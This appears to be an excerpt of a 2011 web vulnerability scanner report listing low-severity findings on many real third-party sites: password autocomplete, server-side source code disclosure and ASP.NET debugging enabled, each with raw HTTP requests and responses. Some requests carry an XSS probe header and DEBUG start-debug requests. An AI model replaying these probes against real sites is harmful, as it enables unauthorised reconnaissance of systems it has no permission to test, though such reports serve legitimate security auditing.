Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...

18.10. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
<!-- UC: Mini Signin -->
<form method="post" id="Form1" action="/UMS/Login.aspx" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)){document.getElementById('MiniSignIn_btnSubmit').click();return false;}} else {return true};">

<input type="hidden" id="formSource" name="formSource" value="MiniSignIn" />
...[SNIP]...
<div class="float-left"><input type="password" name="txtPassword" id="txtPassword" maxlength="40" tabindex="1002" class="minifield" /></div>
...[SNIP]...

18.11. http://www.japanator.com/elephant/login.phtml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="http://www.japanator.com/elephant/login.phtml" method="post">

<input type="hidden" name="back_to" value="">
...[SNIP]...
<br/>
   <input type="password" name="password">
</p>
...[SNIP]...

18.12. http://www.japanator.com/elephant/signup.phtml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="signup.phtml" method="post">

<input type="hidden" name="back_to" value="http://www.japanator.com/elephant/">
...[SNIP]...
<td><input type="password" name="password" value="">
<br>
...[SNIP]...
<td ><input type="password" name="password2" value="">
<br>
...[SNIP]...

18.13. http://www.mrsdash.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mrsdash.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrsdash.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af4qxtezlapjev55htmjv345; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Pag
...[SNIP]...
<body id="sitemap">
   <form name="frmMain" method="post" action="/404iis.aspx?404;http://www.mrsdash.com:80/favicon.ico" id="frmMain">
<div>
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword" type="password" maxlength="25" id="cTopNav_txtPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       <label>
...[SNIP]...
</label>
                       <input name="cTopNav$txtConfirmPassword" type="password" maxlength="25" id="cTopNav_txtConfirmPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       
                       <div class="newsletter">
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword_logn" type="password" maxlength="25" id="cTopNav_txtPassword_logn" onkeydown="setEnterKey('.signinMem', event);" />

                       <p class="more">
...[SNIP]...

18.14. https://www.onlinemicrofiche.com/Electronicpartsfinder/dealerinfo/DealerInfo.asp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /Electronicpartsfinder/dealerinfo/DealerInfo.asp

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Electronicpartsfinder/dealerinfo/DealerInfo.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: http://www.hlsm.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:29:17 GMT
Content-Length: 5101
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>HLSM Electronic Parts Finder.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family
...[SNIP]...
</p>
<form method="post" action="dealerinfo.asp">
<table width="316" border="1" class="size10">
...[SNIP]...
<td width="225">
<input type="password" name="txtPassword" class="size10" size="30">
</td>
...[SNIP]...

19. Source code disclosure
There are 6 instances of this issue:


19.1. http://insurancenewsnet.com/styles/style.css

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://insurancenewsnet.com
Path:   /styles/style.css

Issue detail

The application appears to disclose some server-side source code written in JSP and ASP.

Request

GET /styles/style.css HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 10 Feb 2010 19:52:54 GMT
Accept-Ranges: bytes
ETag: "0af61a28aaaca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:02 GMT
Content-Length: 6099

/*
Uncomment this if processing the page as ASP.NET
*/
<%@ Page Language="C#" %>
<% Response.ContentType = "text/css"; %>

/* global elements */

body
{
   margin: 0px;
   padding: 0px;
   background-color: #dadada;
   background-image: url(http://www.insurancenewsnet.com/images/inn_bodybgtry.gif);
   background-repeat:
...[SNIP]...

19.2. http://resources.infolinks.com/js/213/infolinks.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://resources.infolinks.com
Path:   /js/213/infolinks.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/213/infolinks.js HTTP/1.1
Host: resources.infolinks.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/javascript
Date: Mon, 02 May 2011 02:05:27 GMT
ETag: "2a489c-11831-4a0b89d1a0f40+gzip"
Expires: Wed, 01 Jun 2011 02:05:27 GMT
Last-Modified: Tue, 12 Apr 2011 13:24:37 GMT
Server: ECS (dca/5328)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 71729

...[SNIP]...
...[SNIP]...
<1e id="<%= id %>jV" 1J="<%= 1p %>" 17="<%= 28 %> 1k:95; 1o:0; 1h:6p; 1c:<%= 1c+39-61 %>1w; 1Q:1C(<%= 3c %>3l-v.2U) 2d-y 2l 0 0 1X;">
...[SNIP]...
<1e id="<%= id %>k2" 1J="<%= 1p %>" 17="<%= 28 %> 1k:95; 2D:0; 1h:6p; 1c:<%= 1c+39-61 %>1w; 1Q:1C(<%= 3c %>3l-v.2U) 2d-y 2l -8b 0 1X;">
...[SNIP]...
<1e id="<%= id %>kt" 1J="<%= 1p %>" 17="<%= 28 %> 2A:0; 1o:0; 1h:4b; 1c:8B; 1Q:1C(<%= 3c %>3l.2U) no-2d 2l 0 -8e 1X;">
...[SNIP]...
<1e id="<%= id %>kB" 1J="<%= 1p %>" 17="<%= 28 %> 2A:0; 1o:4b; 1h:<%= 1h+10-60 %>1w; 1c:6p; 1Q:1C(<%= 3c %>3l-h.2U) 2d-x 2l 0 -8b 1X;">
...[SNIP]...
<1e id="<%= id %>kV" 1J="<%= 1p %>" 17="<%= 28 %> 2A:0; 2D:0; 1h:8B; 1c:8B; 1Q:1C(<%= 3c %>3l.2U) no-2d 2l -4b -8e 1X;">
...[SNIP]...
<1e id="<%= id %>e0" 1J="<%= 1p %>" 17="<%= 28 %> 1k:<%= 6T.1k %>1w; 1o:<%= 6T.1o %>1w; 1h:<%= 6T.1h %>1w; 1c:<%= 6T.1c %>1w; z-3j:<%= 4w+6 %>; 3d:3n;" 3C="o.8W(1Z, \\\'<%= 1L.id %>\\\');" 3E="o.9k(\\\'<%= 1L.id %>\\\');" 3U="o.7B(1Z, \\\'<%= 1L.id %>\\\')">
...[SNIP]...

19.3. http://www.allcelebpass.com/favicon.ico

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.allcelebpass.com
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allcelebpass.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:01:29 GMT
Content-Type: text/html
Content-Length: 28521
Last-Modified: Mon, 22 Feb 2010 02:22:23 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

<?php include ("scripts/dte.php")?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml?nats=<?=$_REQUEST['nats']?>">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date1 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date2 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date3 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ;">
...[SNIP]...
<div align="center" class="sitename"> <?php echo $date4 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date5 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date6 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date7 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date8 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date9 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date10 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date11 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date12 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date13 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date14 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date15 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<a href="http://www.rabbitsreviews.com/s794/All-Network-Pass.html?nats=<?=$_REQUEST['nats']?>">
...[SNIP]...
<div align="center" class="footer">
           <?php echo file_get_contents("http://tour.allcelebpass.com/information.php?footer") ?>
       </div>
...[SNIP]...

19.4. http://www.ourprayer.org/favicon.ico

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in JSP and ASP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:41 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQueryString, strURL

If Response.Buffer Then
Response.Clear
Response.Status = "500 Internal Server Error"
Response.ContentType = "text/html"
Response.Expires = 0
End If

Set objASPError = Server.GetLastError
%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
...[SNIP]...
<br>
<%
Dim bakCodepage
on error resume next
   bakCodepage = Session.Codepage
   Session.Codepage = 1252
on error goto 0
Response.Write Server.HTMLEncode(objASPError.Category)
If objASPError.ASPCode > "" Then Response.Write Server.HTMLEncode(", " & objASPError.ASPCode)
Response.Write Server.HTMLEncode(" (0x" & Hex(objASPError.Number) & ")" ) & "<br>"
If objASPError.ASPDescription > "" Then
   Response.Write Server.HTMLEncode(objASPError.ASPDescription) & "<br>"
elseIf (objASPError.Description > "") Then
   Response.Write Server.HTMLEncode(objASPError.Description) & "<br>"
end if
blnErrorWritten = False
' Only show the Source if it is available and the request is from the same machine as IIS
If objASPError.Source > "" Then
strServername = LCase(Request.ServerVariables("SERVER_NAME"))
strServerIP = Request.ServerVariables("LOCAL_ADDR")
strRemoteIP = Request.ServerVariables("REMOTE_ADDR")
If (strServerIP = strRemoteIP) And objASPError.File <> "?" Then
Response.Write Server.HTMLEncode(objASPError.File)
If objASPError.Line > 0 Then Response.Write ", line " & objASPError.Line
If objASPError.Column > 0 Then Response.Write ", column " & objASPError.Column
Response.Write "<br>"
Response.Write "<font style=""COLOR:000000; FONT: 8pt/11pt courier new""><b>"
Response.Write Server.HTMLEncode(objASPError.Source) & "<br>"
If objASPError.Column > 0 Then Response.Write String((objASPError.Column - 1), "-") & "^<br>"
Response.Write "</b></font>"
blnErrorWritten = True
End If
End If
If Not blnErrorWritten And objASPError.File <> "?" Then
Response.Write "<b>" & Server.HTMLEncode( objASPError.File)
If objASPError.Line > 0 Then Response.Write Server.HTMLEncode(", line " & objASPError.Line)
If objASPError.Column > 0 Then Response.Write ", column " & objASPError.Column
Response.Write "</b><br>"
End If
%>

</li>
...[SNIP]...
<br>
<%= Server.HTMLEncode(Request.ServerVariables("HTTP_USER_AGENT")) %>
<br>
...[SNIP]...
<br>
<%
strMethod = Request.ServerVariables("REQUEST_METHOD")
Response.Write strMethod & " "
If strMethod = "POST" Then
Response.Write Request.TotalBytes & " bytes to "
End If
Response.Write Request.ServerVariables("SCRIPT_NAME")
Response.Write "</li>"
If strMethod = "POST" Then
Response.Write "<p><li>POST Data:<br>"
' On Error in case Request.BinaryRead was executed in the page that triggered the error.
On Error Resume Next
If Request.TotalBytes > lngMaxFormBytes Then
Response.Write Server.HTMLEncode(Left(Request.Form, lngMaxFormBytes)) & " . . ."
Else
Response.Write Server.HTMLEncode(Request.Form)
End If
On Error Goto 0
Response.Write "</li>"
End If
%>

<br>
...[SNIP]...
<br>
<%
datNow = Now()
Response.Write Server.HTMLEncode(FormatDateTime(datNow, 1) & ", " & FormatDateTime(datNow, 3))
on error resume next
   Session.Codepage = bakCodepage
on error goto 0
%>

<br>
...[SNIP]...
<br>
<%
strQueryString = "prd=iis&sbp=&pver=5.0&ID=500;100&cat=" & Server.URLEncode(objASPError.Category) & "&os=&over=&hrd=&Opt1=" & Server.URLEncode(objASPError.ASPCode) & "&Opt2=" & Server.URLEncode(objASPError.Number) & "&Opt3=" & Server.URLEncode(objASPError.Description)
strURL = "http://www.microsoft.com/ContentRedirect.asp?" & strQueryString
%>

<ul>
...[SNIP]...
<a href="<%= strURL %>">
...[SNIP]...

19.5. http://www.procuts.com/favicon.ico

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.procuts.com
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.procuts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 11086
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:52 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<!-- SS_BEGIN_SNIPPET(fragment5,ASP)-->
   
   <%
           p_selectOption = 5
           %>

           <!--#INCLUDE Virtual='/includes/brandsites_search_form.asp'-->
...[SNIP]...

19.6. http://www.ronniesmailorder.com/fiche.css

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ronniesmailorder.com
Path:   /fiche.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /fiche.css HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 12 Oct 2009 12:04:12 GMT
Accept-Ranges: bytes
ETag: "046611c344bca1:7c09"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:06:16 GMT
Content-Length: 7591

.header {width:200px; font-size:16px; white-space:nowrap; text-align:left; font-weight:bold; margin-top:5px; cursor:pointer; }
.content {white-space:nowrap; list-style:none; text-indent:0px; font-siz
...[SNIP]...
amily: Arial; font-size: 11pt; text-decoration: none; font-weight: bold; line-height: 14pt;}
#main {width:590px; vertical-align:top; background-color:white;}
.titleBar {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/center_spacer.gif); height:31px;}
.titleBar_left {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/cat_left_header.jpg); _margin-top:-40px; margin-left:10px; width:22px; height:20px; display:inline;}
.titleBar_middle {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/cat_mid_header.jpg); _margin-top:-39px; margin-left:-5px; height:20px; text-align:center; display:inline;font-family: arial; font-size: 9pt; color:#000000; font-weight:bold;}
.titleBar_right {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/cat_right_header.jpg); _margin-top:-40px; margin-left:-5px; width:22px; height:20px; display:inline;}
.description {color: #34332F; font-family: arial; font-size: 8pt; text-decoration: none; font-wei
...[SNIP]...

20. ASP.NET debugging enabled
There are 12 instances of this issue:


20.1. http://www.4yudu.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.4yudu.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.4yudu.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:45:16 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Hosted-By: i4 Solutions
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.2. http://www.abso.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abso.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.abso.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:29:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR NID TAIa OUR NOR" policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.3. http://www.assistedliving.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.assistedliving.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.assistedliving.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:35:48 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.4. http://www.clickinks.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clickinks.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.clickinks.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:49:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.5. http://www.comcastauthorizedoffers.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcastauthorizedoffers.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.comcastauthorizedoffers.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 00:10:52 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
